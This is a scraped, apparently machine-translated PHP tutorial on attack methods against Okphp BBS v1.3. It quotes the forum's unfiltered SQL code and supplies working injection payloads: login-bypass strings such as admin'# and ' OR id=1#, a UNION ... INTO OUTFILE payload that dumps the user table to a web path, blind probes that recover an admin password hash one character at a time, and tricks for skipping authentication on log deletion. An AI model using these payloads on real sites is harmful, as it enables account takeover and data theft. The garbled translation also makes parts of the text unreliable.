Talk about php attack methods php+mysql injection statement construction_PHP tutorial

1. Foreword:
Version information: Okphp BBS v1.3 open source version

Due to PHP and MYSQL itself, PHP+MYSQL injection is more difficult than ASP, especially the construction of statements during injection is more difficult. This is a difficult point. This article mainly uses a simple analysis of some files of Okphp BBS v1.3 to talk about the construction method of php+mysql injection statements. I hope this article will be helpful to you.
Statement: All the "vulnerabilities" mentioned in the article have not been tested and may not exist at all. In fact, it does not matter whether there are loopholes. What is important is the analysis ideas and statement structure.
2. "Vulnerability" analysis:
1.admin/login.php injection leads to authentication bypass vulnerability:
Code:

Copy code The code is as follows:

$conn=sql_connect($dbhost, $dbuser, $dbpswd, $dbname);
$password = md5($password);
$q = "select id,group_id from $user_table where username='$username' and password='$password'";
　$res = sql_query($q,$conn);
　$row = sql_fetch_row($res );
　$q = "select id,group_id from $user_table where username='$username' and password='$password'"

　
$username and $password are not filtered, very Easy to bypass.

Methods for modifying statements such as select * from $user_table where username='$username' and password='$password' are:
Construction 1 (using logical operations): $username=' OR 'a'='a $password=' OR 'a'='a
Equivalent to sql statement:
select * from $user_table where username='' OR 'a'='a' and password=' ' OR 'a'='a'
Construction 2 (use the comment statement # in mysql, /* to comment out $password): $username=admin'#(or admin'/*)
That is:
Select * from $user_table where username='admin'#' and password='$password'"
Equivalent to:
select * from $user_table where username='admin'
In admin/ The $password in the $q statement in login.php is md5 encrypted before querying, so it cannot be bypassed by the statement in construction 1. Here we use construction 2:
　select id,group_id from $user_table where username=' admin'#' and password='$password'"
Equivalent to:
select id,group_id from $user_table where username='admin'
This is true as long as there is a user named admin, if you don’t know User name only knows the corresponding id,
We can construct it like this: $username=' OR id=1#
Equivalent to:
select id,group_id from $user_table where username='' OR id =1# and password='$password' (the one after # is commented out)
We then look at the code:

Copy the code The code is as follows :

　if ($row[0]) {
　// If not admin or super moderator
　if ($username != "admin" && !eregi("(^| &)3($|&)",$row[1])) {
$login = 0;
}
else {
$login = 1;
}
}
　// Fail to login---------------
　if (!$login) {
　write_log("Moderator login","0","password wrong");
echo " ";
exit();
}
// Access ! -------------
else {
session_start();

In the end, it is simply judged by a $login. We only need to submit $login=1 directly through IE to bypass it :).
　2. Users/login.php injection leads to authentication bypass vulnerability:
Code:

Copy code The code is as follows:

$md5password = md5($password);
$q = "select id,group_id,email from $user_table where username='$username' and password='$md5password'";
$ res = sql_query($q,$conn);
$row = sql_fetch_row($res);

If $username is not filtered, use the same comment as 1 and password='$md5password'" ;

3. There is an arbitrary deletion log record vulnerability in adminloglist.php (ps: This seems to have nothing to do with php+mysql injection, just mention it)
The backend of okphp seems to be written very sloppily. The file does not determine whether the administrator has logged in, so that it can be accessed arbitrarily. Let’s look at the code of list.php:

Copy the code The code is as follows:

$arr = array("del_log","log_id","del_id");
get_r($arr);
//
if ($del_log) {
Omit...
　if ($log_id) {
　foreach ($log_id as $val) {
　$q = "delete from $log_table where id='$val'";
　$res = sql_query($q,$conn);
　if ($res) {
　$i++;
　}
　}
　}
　elseif ($del_id) {
　$q = "delete from $log_table where id='$del_id'";
　$res = sql_query($q,$conn);
　}
　$tpl->setVariable( "message","$i log deleted ok!");
　$tpl->setVariable("action","index.php?action=list_log");
　}

The code simply uses get_r($arr); to determine the submitted parameters. We only need to submit the corresponding $del_log, $log_id, $del_id. The deletion will be successful.
4. Multiple files do not filter variables, leading to SQL injection vulnerabilities.
The authors of okphp don’t seem to like filtering :). Basically all variables in SQL statements are "naked". I won’t list the specific files. Please read the code yourself. I will use forumslist_threads.php as an example to briefly talk about it.
Look at the code of list_threads.php:

Copy the code The code is as follows:

$q = "select name,belong_id ,moderator,protect_view,type_class,theme_id,topic_num,faq_num,cream_num,recovery_num,post_num from $type_table where id='$forum_id'";
　$res = sql_query($q,$conn);
　$row = sql_fetch_row($res);

The variable $forum_id is not filtered because mysql does not support subqueries. We can use union construction statements to perform joint queries (requires MySQL version 4.00 or above) to achieve cross-database operations. , we construct it as follows:
Construction 1: Use SELECT * FROM table INTO OUTFILE '/path/file.txt' (mysql is required to have file permissions, please note that the absolute path is required in the win system, such as: c://path/ /file.txt ). Enter the queried content into file.txt, and then we can access the query results through http://ip/path/file.txt. Above we can construct $forum_id like this:
$forum_id=' union select * from user_table into outfile '/path/file.txt'
The following:
$q = "select name,belong_id,moderator, protect_view,type_class,theme_id,topic_num,faq_num,cream_num,recovery_num,post_num from $type_table where id='$forum_id' union select * from user_table into outfile '/path/file.txt'";
The above method requires comparison Harsh, the path to the web must be obtained (usually it can be obtained by submitting wrong variables to cause mysql to report an error), and the magic_gpc=on option of PHP prevents single quotes from appearing in the injection. If magic_gpc=on we can also bypass:
Construction 2: Just like asp cross-database query, directly use union select to construct the statement so that the returned results are different to guess the solution. This method can bypass the single quotes (magic_gpc= on) to continue the injection, but this injection is relatively difficult in PHP, depending on the specific code. For specific statement construction, please refer to pinkeyes' article "php injection example". Below I will give an example of using "different return results" injection combined with okphp: (see vulnerability 5).
5.admin/login.php and users/login.php can be guessed to get the specified user password hash through the SQL statement construction: (Actually, this is the same as vulnerability 1 and 2. It is taken out separately here, mainly to explain the statement. Construction method. )
The problem code is the same as vulnerability 1.
The structure of the statement (ps: because the statement itself is to operate the user library, there is no need to use union):
$username=admin' AND LENGTH(password)=6#
The sql statement becomes:
　$q = "select id,group_id from $user_table where username='admin' AND LENGTH(password)=6#' and password='$password'"
　Equivalent to:
　$q = "select id,group_id from $user_table where username='admin' AND LENGTH(password)=6'"
If LENGTH(password)=6 is true, it will return normally. If it is not true, mysql will report an error.
In this way we can guess the user admin password hash. For example, $username=admin' ord(substring(password,1,1))=57#
You can guess the ascii code value of the first digit of the user's password.........

http://www.bkjia.com/PHPjc/320715.htmlwww.bkjia.comtruehttp: //www.bkjia.com/PHPjc/320715.htmlTechArticle1. Foreword: Version information: Okphp BBS v1.3 open source version Due to PHP and MYSQL itself, PHP+ MYSQL injection is more difficult than ASP, especially the construction of statements during injection. This...